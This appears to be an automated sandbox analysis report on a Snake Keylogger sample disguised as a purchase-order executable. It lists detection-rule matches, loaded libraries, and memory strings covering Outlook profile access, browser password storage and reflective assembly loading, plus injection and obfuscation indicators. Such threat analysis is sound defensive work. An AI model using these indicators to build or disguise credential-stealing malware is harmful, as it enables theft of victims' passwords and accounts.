            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: initial sampleStatic PE information: Filename: 109__Purchase_Order.exe
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_02F7DC940_2_02F7DC94
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_02FF3A880_2_02FF3A88
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BA6AC00_2_05BA6AC0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BAD4A80_2_05BAD4A8
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BA54780_2_05BA5478
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BA54670_2_05BA5467
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BAF6580_2_05BAF658
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BA31180_2_05BA3118
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BA31080_2_05BA3108
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BAD0580_2_05BAD058
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BAD8E00_2_05BAD8E0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BA6A9E0_2_05BA6A9E
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BAFA900_2_05BAFA90
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BAFA800_2_05BAFA80
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0B3882_2_02F0B388
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0C1F02_2_02F0C1F0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F061682_2_02F06168
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0C7B22_2_02F0C7B2
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0C4D02_2_02F0C4D0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0CA922_2_02F0CA92
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0FA102_2_02F0FA10
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F04B312_2_02F04B31
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F068E02_2_02F068E0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F098B82_2_02F098B8
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0BF102_2_02F0BF10
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0BC322_2_02F0BC32
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0EDF02_2_02F0EDF0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0E3102_2_02F0E310
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0E3002_2_02F0E300
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F035CA2_2_02F035CA
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F0B5522_2_02F0B552
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693621275.0000000007740000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 109__Purchase_Order.exe
            Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 109__Purchase_Order.exe
            Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 109__Purchase_Order.exe
            Source: 109__Purchase_Order.exe, 00000000.00000002.1690702654.00000000031DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 109__Purchase_Order.exe
            Source: 109__Purchase_Order.exe, 00000000.00000002.1685326026.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 109__Purchase_Order.exe
            Source: 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 109__Purchase_Order.exe
            Source: 109__Purchase_Order.exe, 00000002.00000002.4074833804.0000000000FB7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 109__Purchase_Order.exe
            Source: 109__Purchase_Order.exeBinary or memory string: OriginalFilenameENYy.exe: vs 109__Purchase_Order.exe
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeSection loaded: dpapi.dllJump to behavior
            Source: 109__Purchase_Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 109__Purchase_Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, c7G1s7QBOOZM36BDQn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, c7G1s7QBOOZM36BDQn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.109__Purchase_Order.exe.320063c.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.109__Purchase_Order.exe.31bc8e8.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.109__Purchase_Order.exe.71f0000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.109__Purchase_Order.exe.31b48d0.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\109__Purchase_Order.exe.logJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMutant created: NULL
            Source: 109__Purchase_Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 109__Purchase_Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000032EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 109__Purchase_Order.exeReversingLabs: Detection: 39%
            Source: unknownProcess created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 109__Purchase_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 109__Purchase_Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 109__Purchase_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: ENYy.pdb source: 109__Purchase_Order.exe
            Source: Binary string: ENYy.pdbSHA256y1 source: 109__Purchase_Order.exe

            Data Obfuscation

            barindex
            Source: 109__Purchase_Order.exe, Home.cs.Net Code: InitializeComponent
            Source: 0.2.109__Purchase_Order.exe.7230000.11.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.109__Purchase_Order.exe.7230000.11.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.cs.Net Code: GXbCksB79k System.Reflection.Assembly.Load(byte[])
            Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.cs.Net Code: GXbCksB79k System.Reflection.Assembly.Load(byte[])
            Source: 0.2.109__Purchase_Order.exe.31a3158.3.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.109__Purchase_Order.exe.31a3158.3.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 109__Purchase_Order.exeStatic PE information: 0x9C6E185A [Sat Mar 1 16:54:50 2053 UTC]
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 0_2_05BAA410 pushad ; retf 0_2_05BAA419
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 2_2_02F09770 push esp; ret 2_2_02F09771
            Source: 109__Purchase_Order.exeStatic PE information: section name: .text entropy: 7.962304539562137
            Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, ofMc7kSjLqFQ721OW8.csHigh entropy of concatenated method names: 'kq1X59TDiD', 'qT9XqZBD2t', 'uYsXdqUql7', 'deJXTDhgBP', 'WCtX96obJj', 'R3JXK0LZG1', 'wMhXHf1hBx', 'gaRXj23cY9', 'xUZXnIvGxw', 'rHJXW594AT'
